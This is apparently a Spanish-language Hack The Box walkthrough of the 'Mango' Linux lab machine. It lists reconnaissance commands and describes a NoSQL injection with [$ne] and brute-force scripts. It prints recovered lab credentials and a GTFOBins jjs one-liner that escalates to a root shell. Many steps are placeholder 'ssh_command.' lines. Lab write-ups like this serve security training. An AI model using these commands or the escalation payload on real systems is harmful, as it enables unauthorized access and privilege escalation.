Mango

Mango


HTB Linux

nmap -A -p- -oA mango 10.129.1.219 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA mango 10.129.1.219

nmap -sU -O -p- -oA mango-udp 10.129.1.219

nikto -h 10.129.1.219:80

ssh_command.

ssh_command.

whatweb http://10.129.1.219

ssh_command.

echo “10.129.1.219 mango.htb” | sudo tee -a /etc/hosts

ssh_command.

Nos dirigimos a https://mango.htb

ssh_command.

searchsploit mango

openssl s_client -connect 10.129.1.219

ssh_command.

echo “10.129.1.219 staging.-order.mango.htb mango.htb” | sudo tee -a /etc/hosts

ssh_command.

Nos dirigimos a https://staging-order.mango.htb

ssh_command.

Nos dirigimos a http://staging-order.mango.htb

ssh_command.

Tratamos de cambiar los atributos de username y password en burpsuite

ssh_command.

Tratamos de hacer cambios para un inyeccion sql

ssh_command.

Seguimos tratando y usamos sleep

ssh_command.

Ahora metemos regex como [$ne]

ssh_command.

Creamos un script para poder usar fuerza bruta

ssh_command.

Ahora hacemos un script para usar fuerza bruta en la contrasena.

ssh_command.

Credenciales-> mango:h3mXK8RhU~f{]f5H

ssh_command.

cd /

find -perm -4000 2>/dev/null

ssh_command.

Vemos la vulnerabilidad con jjs

ssh_command.

ssh_command.

Vamos a gtofbins

ssh_command.

echo “Java.type(‘java.lang.Runtime’).getRuntime().exec(‘/bin/sh -pc $@|sh${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)‘).waitFor()” | ./jjs ls -l /bin/bash

bash -p

ssh_command.

© 2025 Cu3rv0x